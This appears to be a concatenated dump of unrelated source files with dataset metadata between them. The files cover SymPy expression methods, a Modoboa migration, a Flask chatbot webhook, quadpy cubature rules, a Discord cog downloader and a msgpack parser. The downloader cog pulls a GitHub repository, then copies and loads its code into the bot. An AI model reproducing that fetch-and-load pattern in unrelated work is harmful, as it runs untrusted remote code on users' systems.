return n/d.expand(deep=deep, modulus=modulus, **hints)
elif hints.pop('numer', False):
n, d = fraction(self)
return n.expand(deep=deep, modulus=modulus, **hints)/d
# Although the hints are sorted here, an earlier hint may get applied
# at a given node in the expression tree before another because of how
# the hints are applied. e.g. expand(log(x*(y + z))) -> log(x*y +
# x*z) because while applying log at the top level, log and mul are
# applied at the deeper level in the tree so that when the log at the
# upper level gets applied, the mul has already been applied at the
# lower level.
# Additionally, because hints are only applied once, the expression
# may not be expanded all the way. For example, if mul is applied
# before multinomial, x*(x + 1)**2 won't be expanded all the way. For
# now, we just use a special case to make multinomial run before mul,
# so that at least polynomials will be expanded all the way. In the
# future, smarter heuristics should be applied.
# TODO: Smarter heuristics
def _expand_hint_key(hint):
"""Make multinomial come before mul"""
if hint == 'mul':
return 'mulz'
return hint
for hint in sorted(hints.keys(), key=_expand_hint_key):
use_hint = hints[hint]
if use_hint:
hint = '_eval_expand_' + hint
expr, hit = Expr._expand_hint(expr, hint, deep=deep, **hints)
while True:
was = expr
if hints.get('multinomial', False):
expr, _ = Expr._expand_hint(
expr, '_eval_expand_multinomial', deep=deep, **hints)
if hints.get('mul', False):
expr, _ = Expr._expand_hint(
expr, '_eval_expand_mul', deep=deep, **hints)
if hints.get('log', False):
expr, _ = Expr._expand_hint(
expr, '_eval_expand_log', deep=deep, **hints)
if expr == was:
break
if modulus is not None:
modulus = sympify(modulus)
if not modulus.is_Integer or modulus <= 0:
raise ValueError(
"modulus must be a positive integer, got %s" % modulus)
terms = []
for term in Add.make_args(expr):
coeff, tail = term.as_coeff_Mul(rational=True)
coeff %= modulus
if coeff:
terms.append(coeff*tail)
expr = Add(*terms)
return expr
###########################################################################
################### GLOBAL ACTION VERB WRAPPER METHODS ####################
###########################################################################
def integrate(self, *args, **kwargs):
"""See the integrate function in sympy.integrals"""
from sympy.integrals import integrate
return integrate(self, *args, **kwargs)
def simplify(self, ratio=1.7, measure=None):
"""See the simplify function in sympy.simplify"""
from sympy.simplify import simplify
from sympy.core.function import count_ops
measure = measure or count_ops
return simplify(self, ratio, measure)
def nsimplify(self, constants=[], tolerance=None, full=False):
"""See the nsimplify function in sympy.simplify"""
from sympy.simplify import nsimplify
return nsimplify(self, constants, tolerance, full)
def separate(self, deep=False, force=False):
"""See the separate function in sympy.simplify"""
from sympy.core.function import expand_power_base
return expand_power_base(self, deep=deep, force=force)
def collect(self, syms, func=None, evaluate=True, exact=False, distribute_order_term=True):
"""See the collect function in sympy.simplify"""
from sympy.simplify import collect
return collect(self, syms, func, evaluate, exact, distribute_order_term)
def together(self, *args, **kwargs):
"""See the together function in sympy.polys"""
from sympy.polys import together
return together(self, *args, **kwargs)
def apart(self, x=None, **args):
"""See the apart function in sympy.polys"""
from sympy.polys import apart
return apart(self, x, **args)
def ratsimp(self):
"""See the ratsimp function in sympy.simplify"""
from sympy.simplify import ratsimp
return ratsimp(self)
def trigsimp(self, **args):
"""See the trigsimp function in sympy.simplify"""
from sympy.simplify import trigsimp
return trigsimp(self, **args)
def radsimp(self):
"""See the radsimp function in sympy.simplify"""
from sympy.simplify import radsimp
return radsimp(self)
def powsimp(self, deep=False, combine='all'):
"""See the powsimp function in sympy.simplify"""
from sympy.simplify import powsimp
return powsimp(self, deep, combine)
def combsimp(self):
"""See the combsimp function in sympy.simplify"""
from sympy.simplify import combsimp
return combsimp(self)
def factor(self, *gens, **args):
"""See the factor() function in sympy.polys.polytools"""
from sympy.polys import factor
return factor(self, *gens, **args)
def refine(self, assumption=True):
"""See the refine function in sympy.assumptions"""
from sympy.assumptions import refine
return refine(self, assumption)
def cancel(self, *gens, **args):
"""See the cancel function in sympy.polys"""
from sympy.polys import cancel
return cancel(self, *gens, **args)
def invert(self, g, *gens, **args):
"""Return the multiplicative inverse of ``self`` mod ``g``
where ``self`` (and ``g``) may be symbolic expressions).
See Also
========
sympy.core.numbers.mod_inverse, sympy.polys.polytools.invert
"""
from sympy.polys.polytools import invert
from sympy.core.numbers import mod_inverse
if self.is_number and getattr(g, 'is_number', True):
return mod_inverse(self, g)
return invert(self, g, *gens, **args)
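# Sketch: for plain numbers this reduces to a modular inverse, e.g. the
# inverse of 2 mod 5 is 3 because 2*3 = 6 == 1 (mod 5):
#   >>> from sympy import S
#   >>> S(2).invert(5)
#   3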
def round(self, p=0):
"""Return x rounded to the given decimal place.
If a complex number would result, round is applied to the real
and imaginary components of the number.
Examples
========
>>> from sympy import pi, E, I, S, Add, Mul, Number
>>> S(10.5).round()
11.
>>> pi.round()
3.
>>> pi.round(2)
3.14
>>> (2*pi + E*I).round()
6. + 3.*I
The round method has a chopping effect:
>>> (2*pi + I/10).round()
6.
>>> (pi/10 + 2*I).round()
2.*I
>>> (pi/10 + E*I).round(2)
0.31 + 2.72*I
Notes
=====
Do not confuse the Python builtin function, round, with the
SymPy method of the same name. The former always returns a float
(or raises an error if applied to a complex value) while the
latter returns either a Number or a complex number:
>>> isinstance(round(S(123), -2), Number)
False
>>> isinstance(S(123).round(-2), Number)
True
>>> isinstance((3*I).round(), Mul)
True
>>> isinstance((1 + 3*I).round(), Add)
True
"""
from sympy import Float
x = self
if x.is_number and not x.is_Atom:
xn = x.n(2)
if not pure_complex(xn, or_real=True):
raise TypeError('Expected a number but got %s:' %
getattr(getattr(x,'func', x), '__name__', type(x)))
elif x in (S.NaN, S.Infinity, S.NegativeInfinity, S.ComplexInfinity):
return x
if not x.is_real:
i, r = x.as_real_imag()
return i.round(p) + S.ImaginaryUnit*r.round(p)
if not x:
return x
p = int(p)
precs = [f._prec for f in x.atoms(Float)]
dps = prec_to_dps(max(precs)) if precs else None
mag_first_dig = _mag(x)
allow = digits_needed = mag_first_dig + p
if dps is not None and allow > dps:
allow = dps
mag = Pow(10, p) # magnitude needed to bring digit p to units place
xwas = x
x += 1/(2*mag) # add the half for rounding
i10 = 10*mag*x.n((dps if dps is not None else digits_needed) + 1)
if i10.is_negative:
x = xwas - 1/(2*mag) # should have gone the other way
i10 = 10*mag*x.n((dps if dps is not None else digits_needed) + 1)
rv = -(Integer(-i10)//10)
else:
rv = Integer(i10)//10
q = 1
if p > 0:
q = mag
elif p < 0:
rv /= mag
rv = Rational(rv, q)
if rv.is_Integer:
# use str or else it won't be a float
return Float(str(rv), digits_needed)
else:
if not allow and rv > self:
allow += 1
return Float(rv, allow)
class AtomicExpr(Atom, Expr):
"""
A parent class for object which are both atoms and Exprs.
For example: Symbol, Number, Rational, Integer, ...
But not: Add, Mul, Pow, ...
"""
is_number = False
is_Atom = True
__slots__ = []
def _eval_derivative(self, s):
if self == s:
return S.One
return S.Zero
def _eval_is_polynomial(self, syms):
return True
def _eval_is_rational_function(self, syms):
return True
def _eval_is_algebraic_expr(self, syms):
return True
def _eval_nseries(self, x, n, logx):
return self
def _mag(x):
"""Return integer ``i`` such that .1 <= x/10**i < 1
Examples
========
>>> from sympy.core.expr import _mag
>>> from sympy import Float
>>> _mag(Float(.1))
0
>>> _mag(Float(.01))
-1
>>> _mag(Float(1234))
4
"""
from math import log10, ceil, log
from sympy import Float
xpos = abs(x.n())
if not xpos:
return S.Zero
try:
mag_first_dig = int(ceil(log10(xpos)))
except (ValueError, OverflowError):
mag_first_dig = int(ceil(Float(mpf_log(xpos._mpf_, 53))/log(10)))
# check that we aren't off by 1
if (xpos/10**mag_first_dig) >= 1:
assert 1 <= (xpos/10**mag_first_dig) < 10
mag_first_dig += 1
return mag_first_dig
from .mul import Mul
from .add import Add
from .power import Pow
from .function import Derivative, Function
from .mod import Mod
from .exprtools import factor_terms
from .numbers import Integer, Rational
|
bsd-3-clause
| -4,040,034,916,984,503,000
| 33.72596
| 109
| 0.514558
| false
| 4.006842
| false
| false
| false
|
modoboa/modoboa
|
modoboa/relaydomains/migrations/0008_auto_20171123_1653.py
|
1
|
1588
|
# Generated by Django 1.10.7 on 2017-11-23 15:53
from django.db import migrations
def move_relaydomain_to_transport(apps, schema_editor):
"""Transform relaydomains to transports."""
RelayDomain = apps.get_model("relaydomains", "RelayDomain")
RecipientAccess = apps.get_model("relaydomains", "RecipientAccess")
Transport = apps.get_model("transport", "Transport")
ra_to_create = []
for rd in RelayDomain.objects.select_related("domain", "service"):
next_hop = "[{}]:{}".format(rd.target_host, rd.target_port)
tr = Transport.objects.create(
pattern=rd.domain.name,
service="relay",
next_hop=next_hop,
_settings={
"relay_target_host": rd.target_host,
"relay_target_port": rd.target_port,
"relay_verify_recipients": rd.verify_recipients
}
)
rd.domain.transport = tr
rd.domain.save(update_fields=["transport"])
if not rd.verify_recipients:
continue
ra_to_create.append(
RecipientAccess(
pattern=rd.domain.name, action="reject_unverified_recipient"))
RecipientAccess.objects.bulk_create(ra_to_create)
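    # Illustrative (hypothetical data): a RelayDomain for "example.org"
    # pointing at target_host "smtp.example.org" on target_port 25 becomes a
    # Transport with pattern="example.org", service="relay" and
    # next_hop="[smtp.example.org]:25"; if verify_recipients is set, a
    # matching reject_unverified_recipient RecipientAccess row is also created.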
def forward(apps, schema_editor):
"""Empty."""
pass
class Migration(migrations.Migration):
dependencies = [
('relaydomains', '0007_recipientaccess'),
('transport', '0001_initial'),
('admin', '0011_domain_transport'),
]
operations = [
migrations.RunPython(move_relaydomain_to_transport, forward)
]
|
isc
| -2,182,599,120,591,932,700
| 32.083333
| 78
| 0.611461
| false
| 3.950249
| false
| false
| false
|
Akash334/bot
|
app.py
|
1
|
2474
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import urllib
import json
import os
import re
from flask import Flask
from flask import request
from flask import make_response
from random import randint
# Flask app should start in global layout
app = Flask(__name__)
@app.route('/webhook', methods=['POST'])
def webhook():
req = request.get_json(silent=True, force=True)
print('Request:')
print(json.dumps(req, indent=4))
res = processRequest(req)
res = json.dumps(res, indent=4)
# print(res)
r = make_response(res)
r.headers['Content-Type'] = 'application/json'
return r
def processRequest(req):
if req.get('result').get('action') != 'yahooWeatherForecast':
return {}
data = "this is the response from webhook"
res = makeWebhookResult(data)
return res
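# Illustrative payloads (hypothetical): API.AI POSTs JSON such as
# {"result": {"action": "yahooWeatherForecast", ...}} to /webhook; any other
# action returns an empty {} response, otherwise makeWebhookResult() below
# builds the Facebook generic-template card plus quick replies.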
def makeWebhookResult(data):
number = randint(1, 15)
charnumber = '1'
speech = "This is the response from server" + "and" + str(number)
print(speech)
print("Here is your question!")
message= {
"attachment":{
"type":"template",
"payload":{
"template_type":"generic",
"elements":[{
"title":"Get Real",
"image_url":"https://www.getreal.life/images/qus"+str(number)+".png",
"buttons":[
{
"type":"element_share"
}
]
}
]
}
},
"quick_replies": [
{
"content_type":"text",
"title": "Ask Me",
"payload": "Ask Me"
},
{
"content_type":"text",
"title": "Ask Bot",
"payload": "Ask Bot"
},
{
"content_type":"text",
"title": "Download App",
"payload": "Download App"
},
{
"content_type":"text",
"title": "50 Power Questions",
"payload": "50 Power Questions"
},
{
"content_type":"location"
}
]
}
return {
"speech": speech,
"displayText": speech,
"data": {"facebook": message}
# "contextOut": [],
#"source": "apiai-weather-webhook-sample"
}
if __name__ == '__main__':
port = int(os.getenv('PORT', 5000))
print('Starting app on port %d' % port)
app.run(debug=False, port=port, host='0.0.0.0')
|
apache-2.0
| -7,652,880,332,143,322,000
| 22.121495
| 83
| 0.494745
| false
| 3.709145
| false
| false
| false
|
nschloe/quadpy
|
src/quadpy/cn/_stroud_1957.py
|
1
|
1501
|
import numpy as np
from sympy import Rational as frac
from sympy import cos, pi, sin, sqrt
from ..helpers import article, untangle
from ._helpers import CnScheme, _s
_source = article(
authors=["A.H. Stroud"],
title="Remarks on the Disposition of Points in Numerical Integration Formulas",
journal="Mathematical Tables and Other Aids to Computation",
volume="11",
number="60",
month="oct",
year="1957",
pages="257-261",
url="https://doi.org/10.2307/2001945",
)
def stroud_1957_2(n):
r = sqrt(3) / 6
data = [
(1.0, np.array([np.full(n, 2 * r)])),
(+r, _s(n, -1, r)),
(-r, _s(n, +1, r)),
]
points, weights = untangle(data)
points = np.ascontiguousarray(points.T)
return CnScheme("Stroud 1957-2", n, weights, points, 2, _source, 1.511e-14)
def stroud_1957_3(n):
n2 = n // 2 if n % 2 == 0 else (n - 1) // 2
i_range = range(1, 2 * n + 1)
pts = [
[
[sqrt(frac(2, 3)) * cos((2 * k - 1) * i * pi / n) for i in i_range],
[sqrt(frac(2, 3)) * sin((2 * k - 1) * i * pi / n) for i in i_range],
]
for k in range(1, n2 + 1)
]
if n % 2 == 1:
sqrt3pm = np.full(2 * n, 1 / sqrt(3))
sqrt3pm[1::2] *= -1
pts.append(sqrt3pm)
pts = np.vstack(pts).T
data = [(frac(1, 2 * n), pts)]
points, weights = untangle(data)
points = np.ascontiguousarray(points.T)
return CnScheme("Stroud 1957-3", n, weights, points, 3, _source)
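# Usage sketch (hedged: assumes these constructors are re-exported under
# quadpy.cn and that CnScheme.integrate and cn.ncube_points keep their usual
# signatures -- check the installed quadpy version):
#   import quadpy
#   scheme = quadpy.cn.stroud_1957_2(3)
#   val = scheme.integrate(
#       lambda x: x[0] ** 2,
#       quadpy.cn.ncube_points([0.0, 1.0], [0.0, 1.0], [0.0, 1.0]),
#   )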
|
mit
| -844,945,079,170,114,800
| 26.796296
| 83
| 0.545636
| false
| 2.784787
| false
| false
| false
|
logicaloperate/Project-Apollo
|
cogs/downloader.py
|
1
|
6114
|
import discord
from discord.ext import commands
from .utils.dataIO import fileIO
from .utils import checks
from .utils.chat_formatting import box
from __main__ import send_cmd_help, set_cog
import os
from subprocess import call, Popen
from distutils.dir_util import copy_tree
import shutil
import asyncio
class Downloader:
"""Cog downloader/installer."""
def __init__(self, bot):
self.bot = bot
self.path = "data/downloader/cogs/"
@commands.group(pass_context=True)
@checks.is_owner()
async def cog(self, ctx):
"""Additional cogs management"""
if ctx.invoked_subcommand is None:
await send_cmd_help(ctx)
@cog.command(name="list")
async def _send_list(self):
"""Lists installable cogs"""
index = await self.make_index()
msg = "Available cogs:\n\n"
for cog in index.keys():
if not index[cog]["DISABLED"]:
msg += cog + "\t" + index[cog]["NAME"] + "\n"
await self.bot.say(box(msg)) # Need to deal with over 2000 characters
@cog.command()
async def info(self, cog : str):
"""Shows info about the specified cog"""
cogs = self.list_cogs()
info_file = self.path + cog + "/info.json"
if cog in cogs:
if os.path.isfile(info_file):
data = fileIO(info_file, "load")
msg = "{} by {}\n\n".format(cog, data["AUTHOR"])
msg += data["NAME"] + "\n\n" + data["DESCRIPTION"]
await self.bot.say(box(msg))
else:
await self.bot.say("The specified cog has no info file.")
else:
await self.bot.say("That cog doesn't exist. Use cog list to see the full list.")
@cog.command(hidden=True)
async def search(self, *terms : str):
"""Search installable cogs"""
pass #TO DO
@cog.command(pass_context=True)
async def update(self, ctx):
"""Updates cogs"""
self.update_repo()
await self.bot.say("Downloading updated cogs. Wait 10 seconds...")
await asyncio.sleep(10) # TO DO: Wait for the result instead, without being blocking.
downloadable_cogs = self.list_cogs()
all_cogs = [f.replace(".py", "") for f in os.listdir("cogs/") if f.endswith(".py")]
installed_user_cogs = [f for f in all_cogs if f in downloadable_cogs]
for cog in installed_user_cogs:
result = await self.install(cog)
await self.bot.say("Cogs updated. Reload all installed cogs? (yes/no)")
answer = await self.bot.wait_for_message(timeout=15, author=ctx.message.author)
if answer is None:
await self.bot.say("Ok then, you can reload cogs with `{}reload <cog_name>`".format(ctx.prefix))
elif answer.content.lower().strip() in ["yes", "y"]:
for cog in installed_user_cogs:
self.bot.unload_extension("cogs." + cog)
self.bot.load_extension("cogs." + cog)
await self.bot.say("Done.")
else:
await self.bot.say("Ok then, you can reload cogs with `{}reload <cog_name>`".format(ctx.prefix))
@cog.command(name="install", pass_context=True)
async def _install(self, ctx, cog : str):
"""Installs specified cog"""
install_cog = await self.install(cog)
if install_cog:
await self.bot.say("Installation completed. Load it now? (yes/no)")
answer = await self.bot.wait_for_message(timeout=15, author=ctx.message.author)
if answer is None:
await self.bot.say("Ok then, you can load it with `{}load {}`".format(ctx.prefix, cog))
elif answer.content.lower().strip() in ["yes", "y"]:
set_cog("cogs." + cog, True)
self.bot.unload_extension("cogs." + cog)
self.bot.load_extension("cogs." + cog)
await self.bot.say("Done.")
else:
await self.bot.say("Ok then, you can load it with `{}load {}`".format(ctx.prefix, cog))
elif install_cog == False:
await self.bot.say("Invalid cog. Installation aborted.")
else:
await self.bot.say("That cog doesn't exist. Use cog list to see the full list.")
async def make_index(self):
cogs = self.list_cogs()
index = {}
if not cogs:
await self.bot.say("There are no cogs available for installation.")
return
for cog in cogs:
if os.path.isfile(self.path + cog + "/info.json"):
info = fileIO(self.path + cog + "/info.json", "load")
index[cog] = info
# Sort by alphabetic order?
return index
async def install(self, cog):
cogs = self.list_cogs()
cog = cog.lower()
if cog not in cogs:
return None
files = [f for f in os.listdir(self.path + cog) if os.path.isfile(self.path + cog + "/" + f)] # Listing all files (not dirs) in the cog directory
cog_file = [f for f in files if f.endswith(".py")] #Verifying the presence of a single py file
if len(cog_file) != 1:
return False
cog_file = cog_file[0]
print("Copying {}...".format(cog_file))
shutil.copy(self.path + cog + "/" + cog_file, "cogs/")
cog_data_path = self.path + cog + "/data"
if os.path.exists(cog_data_path):
print("Copying {}'s data folder...".format(cog))
copy_tree(cog_data_path, "data/" + cog)
return True
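    # Expected repository layout (derived from the code above): each
    # installable cog lives at data/downloader/cogs/<cog>/ and must contain
    # exactly one .py file; an optional info.json provides
    # NAME/AUTHOR/DESCRIPTION and an optional data/ folder is copied to
    # data/<cog>/ on install.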
def list_cogs(self):
dirs = [d for d in os.listdir(self.path) if os.path.exists(self.path + d)]
return dirs
def update_repo(self):
if not os.path.exists("data/downloader"):
print("Downloading cogs repo...")
call(["git", "clone", "https://github.com/Twentysix26/Red-Cogs.git", "data/downloader"]) # It's blocking but it shouldn't matter
else:
Popen(["git", "-C", "data/downloader", "pull", "-q"])
def setup(bot):
n = Downloader(bot)
n.update_repo()
bot.add_cog(n)
|
gpl-3.0
| 4,744,360,861,402,750,000
| 40.598639
| 153
| 0.570985
| false
| 3.592244
| false
| false
| false
|
arizvisa/syringe
|
template/protocol/mp.py
|
1
|
13773
|
import ptypes
from ptypes import *
ptypes.setbyteorder(ptypes.config.byteorder.bigendian)
### definitions
class bit0(ptype.definition): cache = {}
class bit1(ptype.definition): cache = {}
class bit2container(ptype.definition): cache = {}
class bit2msgtype(ptype.definition): cache = {}
class bit3arraymap(ptype.definition): cache = {}
class d_packet(ptype.definition): cache = {}
### packet
class packet(pstruct.type):
_fields_ = [
(lambda s: t_packet, 'type'),
(lambda s: d_packet.lookup(s['type'].li.PackedType()), 'data'),
]
def packedValue(self):
return self['type'].PackedValue()
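# Decoding sketch (hedged: assumes the usual ptypes loading idiom; the
# accessors shown are hypothetical shorthand):
#   data = b'\xa3foo'                             # msgpack fixstr "foo"
#   pkt = packet(source=ptypes.prov.bytes(data)).l
#   pkt['data']['Value'].str()                    # -> "foo"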
class t_packet(pbinary.struct):
def __value(self):
return bit0.lookup(self['otherQ'])
_fields_ = [
(1, 'otherQ'),
(__value, 'value'),
]
def PackedType(self):
'''Return the msgpack type-id for the packet.'''
return self.__field__('value').PackedType()
def PackedValue(self):
'''Return the integer value encoded within the type field of the packet.'''
return self.__field__('value').PackedValue()
def summary(self):
res = d_packet.lookup(self.PackedType())
return '{:s} {:s}'.format(res.typename(), super(t_packet,self).summary())
## first bit : positive-fixint or other
@bit0.define
class t_positive_fixint(pbinary.integer):
type = 0
def blockbits(self): return 7
def PackedType(self): return 0b00000000
def PackedValue(self): return self.int()
@bit0.define
class t_fixother(pbinary.struct):
type = 1
def __value(self):
return bit1.lookup(self['groupQ'])
_fields_ = [
(1, 'groupQ'),
(__value, 'value'),
]
def PackedType(self): return self.__field__('value').PackedType()
def PackedValue(self): return self.__field__('value').PackedValue()
## second bit : container or group
@bit1.define
class t_1fixcontainer(pbinary.struct):
type = 0
def __value(self):
return bit2container.lookup(self['strQ'])
_fields_ = [
(1, 'strQ'),
(__value, 'value'),
]
def PackedType(self): return self.__field__('value').PackedType()
def PackedValue(self): return self.__field__('value').PackedValue()
@bit1.define
class t_fixgroup(pbinary.struct):
type = 1
def __value(self):
return bit2msgtype.lookup(self['negative-fixintQ'])
_fields_ = [
(1, 'negative-fixintQ'),
(__value, 'value'),
]
def PackedType(self): return self.__field__('value').PackedType()
def PackedValue(self): return self.__field__('value').PackedValue()
## third bit : str or array/map
@bit2container.define
class t_fixstr(pbinary.integer):
type = 1
def blockbits(self): return 5
def PackedType(self): return 0b10100000
def PackedValue(self): return self.int()
@bit2container.define
class t_2fixcontainer(pbinary.struct):
type = 0
def __container(self):
return bit3arraymap.lookup(self['arrayQ'])
_fields_ = [
(1, 'arrayQ'),
(__container, 'value'),
]
def PackedType(self): return self.__field__('value').PackedType()
def PackedValue(self): return self.__field__('value').PackedValue()
## fourth bit: array or map
@bit3arraymap.define
class t_fixmap(pbinary.integer):
type = 0
def blockbits(self): return 4
def PackedType(self): return 0b10000000
def PackedValue(self): return self.int()
@bit3arraymap.define
class t_fixarray(pbinary.integer):
type = 1
def blockbits(self): return 4
def PackedType(self): return 0b10010000
def PackedValue(self): return self.int()
## third bit : negative-fixint or messagetype
@bit2msgtype.define
class t_negative_fixint(pbinary.integer):
type = 1
def blockbits(self): return 5
def PackedType(self): return 0b11100000
def PackedValue(self): return self.int()
@bit2msgtype.define
class t_message(pbinary.enum):
type, length = 0, 5
def PackedType(self): return (0b11 << 6) | self.int()
def PackedValue(self): raise NotImplementedError
_values_ = [
('nil', 0b00000),
('(neverused)', 0b00001),
('false', 0b00010),
('true', 0b00011),
('bin8', 0b00100),
('bin16', 0b00101),
('bin32', 0b00110),
('ext8', 0b00111),
('ext16', 0b01000),
('ext32', 0b01001),
('float32', 0b01010),
('float64', 0b01011),
('uint8', 0b01100),
('uint16', 0b01101),
('uint32', 0b01110),
('uint64', 0b01111),
('int8', 0b10000),
('int16', 0b10001),
('int32', 0b10010),
('int64', 0b10011),
('fixext1', 0b10100),
('fixext2', 0b10101),
('fixext4', 0b10110),
('fixext8', 0b10111),
('fixext16', 0b11000),
('str8', 0b11001),
('str16', 0b11010),
('str32', 0b11011),
('array16', 0b11100),
('array32', 0b11101),
('map16', 0b11110),
('map32', 0b11111),
]
### Message data types
class summaryStructure(pstruct.type):
def summary(self):
if len(self._fields_) > 1:
return super(summaryStructure, self).summary()
res = ('{:s}={:s}'.format(k, self[k].summary()) for _, k in self._fields_)
return '{{{:s}}}'.format(', '.join(res))
class ConstantHolder(ptype.block):
constant = None
def get(self):
# presumably meant to expose the class-level constant (None/True/False)
return self.constant
def set(self, value):
raise NotImplementedError
class PackedIntegerHolder(pint.uint_t):
def get(self):
return self.getparent(packet).packedValue()
def summary(self):
return '{integer:d} ({integer:+#x})'.format(integer=self.get())
def set(self, value):
pkt = self.getparent(packet)
leafs = pkt['type'].traverse(edges=lambda self: self.value, filter=lambda self: isinstance(self, pbinary.type) and self.bits() > 1)
res = list(leafs)[-1]
if res.name() != 'value':
raise AssertionError
return res.set(value)
@d_packet.define
class d_nil(summaryStructure):
type = 0b11000000
class _ConstantHolderNone(ConstantHolder): constant = None
_fields_ = [(_ConstantHolderNone, 'Value')]
@d_packet.define
class d_true(summaryStructure):
type = 0b11000010
class _ConstantHolderTrue(ConstantHolder): constant = True
_fields_ = [(_ConstantHolderTrue, 'Value')]
@d_packet.define
class d_false(summaryStructure):
type = 0b11000011
class _ConstantHolderFalse(ConstantHolder): constant = False
_fields_ = [(_ConstantHolderFalse, 'Value')]
@d_packet.define
class d_positive_fixint(summaryStructure):
type = 0b00000000
_fields_ = [(PackedIntegerHolder, 'Value')]
@d_packet.define
class d_negative_fixint(summaryStructure):
type = 0b11100000
class _PackedSignedIntegerHolder(PackedIntegerHolder):
def get(self):
return -0x20 + super(d_negative_fixint._PackedSignedIntegerHolder, self).get()
_fields_ = [(_PackedSignedIntegerHolder, 'Value')]
@d_packet.define
class d_uint8(summaryStructure):
type = 0b11001100
_fields_ = [(pint.uint8_t,'Value')]
@d_packet.define
class d_uint16(summaryStructure):
type = 0b11001101
_fields_ = [(pint.uint16_t,'Value')]
@d_packet.define
class d_uint32(summaryStructure):
type = 0b11001110
_fields_ = [(pint.uint32_t,'Value')]
@d_packet.define
class d_uint64(summaryStructure):
type = 0b11001111
_fields_ = [(pint.uint64_t,'Value')]
@d_packet.define
class d_int8(summaryStructure):
type = 0b11010000
_fields_ = [(pint.int8_t,'Value')]
@d_packet.define
class d_int16(pstruct.type):
type = 0b11010001
_fields_ = [(pint.int16_t,'Value')]
@d_packet.define
class d_int32(pstruct.type):
type = 0b11010010
_fields_ = [(pint.int32_t,'Value')]
@d_packet.define
class d_int64(pstruct.type):
type = 0b11010011
_fields_ = [(pint.int64_t,'Value')]
@d_packet.define
class d_float32(pstruct.type):
type = 0b11001010
_fields_ = [(pfloat.single,'Value')]
@d_packet.define
class d_float64(pstruct.type):
type = 0b11001011
_fields_ = [(pfloat.double,'Value')]
@d_packet.define
class d_fixstr(summaryStructure):
type = 0b10100000
_fields_ = [
(PackedIntegerHolder, 'Length'),
(lambda s: dyn.clone(pstr.string, length=s['Length'].li.get()), 'Value'),
]
@d_packet.define
class d_str8(summaryStructure):
type = 0b11011001
_fields_ = [
(pint.uint8_t, 'Length'),
(lambda s: dyn.clone(pstr.string, length=s['Length'].li.get()), 'Value'),
]
@d_packet.define
class d_str16(summaryStructure):
type = 0b11011010
_fields_ = [
(pint.uint16_t, 'Length'),
(lambda s: dyn.clone(pstr.string, length=s['Length'].li.get()), 'Value'),
]
@d_packet.define
class d_str32(summaryStructure):
type = 0b11011011
_fields_ = [
(pint.uint32_t, 'Length'),
(lambda s: dyn.clone(pstr.string, length=s['Length'].li.get()), 'Value'),
]
@d_packet.define
class d_bin8(summaryStructure):
type = 0b11000100
_fields_ = [
(pint.uint8_t, 'Length'),
(lambda s: dyn.block(s['Length'].li.get()), 'Value'),
]
@d_packet.define
class d_bin16(summaryStructure):
type = 0b11000101
_fields_ = [
(pint.uint16_t, 'Length'),
(lambda s: dyn.block(s['Length'].li.get()), 'Value'),
]
@d_packet.define
class d_bin32(summaryStructure):
type = 0b11000110
_fields_ = [
(pint.uint32_t, 'Length'),
(lambda s: dyn.block(s['Length'].li.get()), 'Value'),
]
@d_packet.define
class d_fixarray(summaryStructure):
type = 0b10010000
_fields_ = [
(PackedIntegerHolder, 'Length'),
(lambda s: dyn.array(packet, s['Length'].li.get()), 'Value'),
]
@d_packet.define
class d_array16(summaryStructure):
type = 0b11011100
_fields_ = [
(pint.uint16_t, 'Length'),
(lambda s: dyn.array(packet, s['Length'].li.get()), 'Value'),
]
@d_packet.define
class d_array32(summaryStructure):
type = 0b11011101
_fields_ = [
(pint.uint32_t, 'Length'),
(lambda s: dyn.array(packet, s['Length'].li.get()), 'Value'),
]
@d_packet.define
class d_fixmap(summaryStructure):
type = 0b10000000
_fields_ = [
(PackedIntegerHolder, 'Length'),
(lambda s: dyn.array(packet, s['Length'].li.get()*2), 'Value'),
]
def Data(self):
p = self.getparent(packet)
return p['type'].PackedValue()
@d_packet.define
class d_map16(summaryStructure):
type = 0b11011110
_fields_ = [
(pint.uint16_t, 'Length'),
(lambda s: dyn.array(packet, s['Length'].li.get()*2), 'Value'),
]
@d_packet.define
class d_map32(summaryStructure):
type = 0b11011111
_fields_ = [
(pint.uint32_t, 'Length'),
(lambda s: dyn.array(packet, s['Length'].li.get()*2), 'Value'),
]
@d_packet.define
class d_fixext1(summaryStructure):
type = 0b11010100
_fields_ = [
(pint.sint8_t, 'Type'),
(dyn.array(pint.uint8_t, 1), 'Value'),
]
@d_packet.define
class d_fixext2(summaryStructure):
type = 0b11010101
_fields_ = [
(pint.sint8_t, 'Type'),
(dyn.array(pint.uint8_t, 2), 'Value'),
]
@d_packet.define
class d_fixext4(summaryStructure):
type = 0b11010110
_fields_ = [
(pint.sint8_t, 'Type'),
(dyn.array(pint.uint8_t, 4), 'Value'),
]
@d_packet.define
class d_fixext8(summaryStructure):
type = 0b11010111
_fields_ = [
(pint.sint8_t, 'Type'),
(dyn.array(pint.uint8_t, 8), 'Value'),
]
@d_packet.define
class d_fixext16(summaryStructure):
type = 0b11011000
_fields_ = [
(pint.sint8_t, 'Type'),
(dyn.array(pint.uint8_t, 16), 'Value'),
]
@d_packet.define
class d_ext8(summaryStructure):
type = 0b11000111
# the ext8/16/32 layouts were missing their payload; it follows the type byte
_fields_ = [(pint.uint8_t, 'Length'), (pint.sint8_t, 'Type'), (lambda s: dyn.block(s['Length'].li.get()), 'Value')]
@d_packet.define
class d_ext16(summaryStructure):
type = 0b11001000
_fields_ = [(pint.uint16_t, 'Length'), (pint.sint8_t, 'Type'), (lambda s: dyn.block(s['Length'].li.get()), 'Value')]
@d_packet.define
class d_ext32(summaryStructure):
type = 0b11001001
_fields_ = [(pint.uint32_t, 'Length'), (pint.sint8_t, 'Type'), (lambda s: dyn.block(s['Length'].li.get()), 'Value')]
if __name__ == '__main__':
import types
import operator,functools,itertools
res = [130,196,4,116,121,112,101,196,7,119,111,114,107,101,114,115, 196,4,100,97,116,97,145,130,196,8,119,111,114,107,101,114,105,100, 196,5,115,116,100,46,49,196,5,115,108,111,116,115,160]
res = str().join(map(chr,res))
# https://github.com/msgpack/msgpack-python/blob/master/test/test_format.py
#res = b"\x96" b"\xde\x00\x00" b"\xde\x00\x01\xc0\xc2" b"\xde\x00\x02\xc0\xc2\xc3\xc2" b"\xdf\x00\x00\x00\x00" b"\xdf\x00\x00\x00\x01\xc0\xc2" b"\xdf\x00\x00\x00\x02\xc0\xc2\xc3\xc2"
_fixnum = res = b"\x92\x93\x00\x40\x7f\x93\xe0\xf0\xff"
_fixarray = res = b"\x92\x90\x91\x91\xc0"
